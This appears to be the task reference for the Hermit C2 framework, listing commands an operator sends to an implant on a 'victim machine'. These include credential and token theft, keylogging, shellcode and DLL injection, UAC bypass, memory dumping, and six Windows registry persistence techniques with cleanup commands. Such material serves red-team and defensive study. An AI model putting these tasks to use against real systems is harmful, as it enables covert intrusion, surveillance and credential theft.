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After C2 agents connected to listeners, we can send various tasks in Agent Mode.
Before sending tasks, we need to switch to Agent Mode at first.

Currently, the following tasks are available:

  assembly        Load and execute .NET assembly.
  cat             Read contents of a file.
  cd              Change the working directory.
  cmd             Execute arbitrary system command.
  connect         Change listener URL to connect.
  cp              Copy a file.
  creds steal     Steal credentials from various resources on the target computer
  dll             Load DLL and inject modules into the specified process.
  download        Download a file.
  env ls          List environment variables.
  envs            alias for 'env ls'
  find            Find files.
  group ls        List local groups.
  groups          Alias for 'group ls'.
  history         Retrieve information from history files of applications
  ip              Print the network interface information on target computer
  jitter          Set jitter time (seconds) between requests from beacon
  keylog          Keylogging N seconds.
  kill            Terminate the current process.
  killdate        Change killdate (UTC) for the implant beacon.
  ls              List files in a directory.
  migrate         Migrate the implant into another process.
  mkdir           Create a new directory.
  mv              Move a file to a destination location.
  net             Get TCP connections.
  pe              Load and execute PE (Portable Executable) file.
  persist         Establish persistence for implant.
  procdump        Dump process memory to a specified output file.
  ps kill         Terminate a process.
  ps ls           List processes.
  pwd             Print the current working directory.
  reg query       Enumerate subkeys for the specified path.
  rm              Remove a file.
  rmdir           Remove a directory.
  rportfwd add    Add settings to reverse port forwarding.
  rportfwd ls     List settings for reverse port forwarding.
  rportfwd rm     Stop and remove listener for reverse port forwarding.
  runas           Execute a program as another user.
  screenshot      Take a screenshot on target computer.
  shellcode       Inject shellcode into the specified process.
  sleep           Set sleep time (seconds) between requests from beacon.
  token revert    Revert back to the original process token.
  token steal     Steal token from the specified process and impersonate process.
  uac             Bypass UAC and start another session.
  upload          Upload a file to the target computer.
  user ls         List users.
  users           Alias for 'user ls'.
  whoami          Print the current user information.

Most task commands are similar to system commands.
For each usage, run help <command> or help <command> <subcommand> on Agent mode.


Prints contents of a file.

Hermit [agent-abcd] > cat example.txt


Changes current working directory.
Please note that if you want to use a backslash (\) in the desination path, you need to add another backslash (\\) as below:

Hermit [agent-abcd] > cd "C:\\Program Files\\"

Or you can use a normal slash (/) instead of a backslash:

Hermit [agent-abcd] > cd "C:/Program Files/"


Executes an arbitrary system command.

Hermit [agent-abcd] > cmd "dir -Force"


Changes the connected listener URL to new one.
This is used when we want to change to another listener for communication.

Hermit [agent-abcd] > connect


Copies a file to destination path on a victim machine.
We can specify an absolute path or a relative path.

Hermit [agent-abcd] > cp /tmp/example.txt ./example.txt


Injects DLL into specified process.

# -p: target process ID
# -f: a DLL file path
Hermit [agent-abcd] > dll -p 1234 -f /path/to/example.dll

To see running processes and check PIDs, use ps ls task.


Downloads a file from victim machine.

Hermit [agent-abcd] > download C:/Users/John/Desktop/example.txt /tmp/example.txt


env ls, envs

Lists environment variables in victim machine.


Find files or directories that contain the specified strings.

# -n: Specified strings
Hermit [agent-abcd] > find -n "creds.txt" ./


group ls, groups

Lists local groups in victim machine.


Changes the Jitter time (N seconds).

Hermit [agent-abcd] > jitter 10


Runs keylogger for N seconds.

# Keylogging for one minute.
Hermit [agent-abcd] > keylog 60


Terminates the implant process.
After running this task, the connection with the C2 agent will be terminated.


Changes the KillDate datetime.
Specify in UTC. And the format is such like 2025-01-01 00:00:00.

Hermit [agent-abcd] > killdate 2025-01-01 06:01:20


Lists files in current working directory in victim machine.


Migrates the implant to another process.
Specify the target process ID (PID).

Hermit [agent-abcd] > migrate 1234

To see running processes and PIDs, use ps ls task.


Creates a new directory in current working directory in victim machine.

Hermit [agent-abcd] > mkdir new_dir


Move a file to specified place.

Hermit [agent-abcd] > mv ./example.txt C:/Users/John/Documents/example.txt


Prints open ip/ports.


Loads and executes a Portable Executable (.exe) file.

# -f: an executable file path
Hermit [agent-abcd] > pe -f /path/to/example.exe


Make the implant persistence.

Hermit [agent-abcd] > persist

We can select the persistence technique in wizard.

Technique 1: runkey

Add an entry (the implant path) to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The implant will run every time the victim machine starts.


Windows Victim Machine
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "RandomName"

Replace the RandomName with the actual name which is randomly generated strings. To see the name, check with Registry Editor (regedit).

Technique 2: user-init-mpr-logon-script

Uses UserInitMprLogonScript.
Add an entry (the imaplant path) to HKCU\Environment.
The implant will run every time a user logs in.


Windows Victim Machine
Remove-ItemProperty -Path "HKCU:\Environment" -Name "UserInitMprLogonScript"

Technique 3: screensaver

Add an entry (the implant path) to HKCU\Control Panel\Desktop.
The implant will run after a period of user inactivity.


Windows Victim Machine
Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'ScreenSaveTimeOut'
Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'SCRNSAVE.EXE'

Technique 4: default-file-extension-hijacking

Update an entry for HKEY_CLASSES_ROOT\txtfile\shell\open\command.
Overwrite the default application when clicking a .txt file. It's required to Administrator privilege.


Windows Victim Machine
reg add "HKEY_CLASSES_ROOT\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "%SystemRoot%\system32\NOTEPAD.EXE %1"

Technique 5: ifeo

Uses Image File Execution Options.
Write entries for HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe and HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe.
It's required to Administrator privilege.


Windows Victim Machine
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" -Name 'GlobalFlag'
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'ReportingMode'
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'MonitorProcess'

Technique 6: winlogon

Add an entry (the implant path) to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.
The implant will run every time a user logs on. It's required to Administrator privilege.


Windows Victim Machine
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f


Dump process memory and save it to dump file.
Specify a target process ID (PID).

Hermit [agent-abcd] > procdump 1234

After dumping, the dump file is saved under $HOME/.hermit/server/agents/agent-<name>/loot/procdumps folder.
To see running processes and PIDs, use ps ls task.


Manages processes.

ps kill

Terminates a specified process.

Hermit [agent-abcd] > ps kill 1234

ps ls

Lists all running processes.


Prints the current working directory.


Manages registy keys.

reg query

Retrieve registry values. For recursively, add -r flag.

Hermit [agent-abcd] > reg query "HKLM\\SOFTWARE\\Microsoft" -r


Removes a file.

Hermit [agent-abcd] > rm example.txt


Removes a directory.

Hermit [agent-abcd] > rmdir example_dir


Under development.


Runs a command as another user.

Hermit [agent-abcd] > runas -u Administrator -p 'Password123' notepad.exe


Takes a screenshot and save it as PNG file.

Hermit [agent-abcd] > screenshot

After successful, the captured image file is saved under $HOME/.hermit/server/agents/agent-<name>/loot/screenshots folder.


Injects shellcode to specified process.

# -p: target process ID
# -f: a shellcode file path
Hermit [agent-abcd] > shellcode -p 1234 -f /path/to/shellcode.bin

To see running processes and PIDs, use ps ls task.


Changes the Sleep time (N seconds).

Hermit [agent-abcd] > sleep 10


Manages token.

token revert

Reverts back to the original process token.

token steal

Steal token from a specified process and impersonate.
Please specify either --process or --login flag.

# --process: Execute process with stolen token.
Hermit [agent-abcd] > token steal --pid 1234 --process notepad.exe

# --login: Impersonate logged on.
Hermit [agent-abcd] > token steal --pid 1234 --login


Upload a file to victim machine.

Hermit [agent-abcd] > upload /tmp/example.txt C:/Users/John/Desktop/example.txt


Manages users.

user ls, users

Lists local users.


Prints current user information on victim machine.

Hermit [agent-abcd] > whoami

To print the privileges, add --priv flag.

Hermit [agent-abcd] > whoami --priv